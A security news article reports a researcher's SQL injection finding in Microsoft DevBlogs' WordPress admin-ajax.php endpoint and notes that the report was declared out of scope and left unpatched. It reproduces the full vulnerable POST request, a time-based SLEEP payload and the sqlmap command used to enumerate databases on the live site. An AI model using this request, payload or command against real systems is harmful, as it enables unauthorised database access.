SQL Injection Vulnerability in Microsoft DevBlogs Enables Malicious SQL

Home/Internet Security, malicious cyber actors, Security Advisory, Security Update, vulnerability/SQL Injection Vulnerability in Microsoft DevBlogs Enables Malicious SQL

SQL Injection Vulnerability in Microsoft DevBlogs Enables Malicious SQL

A security researcher recently discovered a critical SQL injection vulnerability on Microsoft’s DevBlogs site (https://devblogs.microsoft.com), allowing attackers to manipulate the database with malicious SQL queries, threatening platform security and data integrity.

SQL Injection Vulnerability

The vulnerability was found in the WordPress-based CMS of DevBlogs, specifically in a request to the admin-ajax.php endpoint handling asynchronous operations:

POST /wp-admin/admin-ajax.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Accept: /

x-requested-with: XMLHttpRequest

Referer: https://devblogs.microsoft.com/

Cookie: VALUE

Content-Length: 17894

Accept-Encoding: gzip,deflate,br

User-Agent: NOTROBOT

Host: devblogs.microsoft.com

Connection: Keep-alive

action=load_more_results2&limit=10&offset=10&query=HELLO&search_term=the

The query parameter was vulnerable to SQL injection. Using a time-based payload like (SELECT 4008 FROM (SELECT(SLEEP(5)))LDNk), the researcher showed it could exploit and manipulate database queries.

The researcher used sqlmap to extract database names, proving the vulnerability. The command:

sqlmap -r savedreqsql.txt --dbs --force-ssl -p query

revealed databases like information_schema, performance_schema, and wp_devblogs.

The researcher found that the vulnerability also supported error-based SQL injection, which was easier to exploit than the initial time-based method.

After reporting the issue to Microsoft’s security team, researcher Zhenwarx received an unexpected response. Despite the severity of the flaw, the DevBlogs subdomain was marked “out of scope,” leaving the vulnerability unpatched at the time.

This highlights the critical need for proper input validation and clear scope definitions in bug bounty programs.

DevBlogs, as a public-facing Microsoft subdomain, is a prime target for attackers. Organizations should regularly audit security practices, especially on WordPress platforms, to prevent such vulnerabilities. There is hope Microsoft will reassess its scope and resolve the issue soon.

‍Follow Us on: Twitter, InstagramFacebook to get the latest security news!

By | 2025-01-23T02:13:47+05:30 January 22nd, 2025|Internet Security, malicious cyber actors, Security Advisory, Security Update, vulnerability|

About the Author:

FirstHackersNews- Identifies Security

Leave A Comment

Subscribe to our newsletter to receive security tips everday!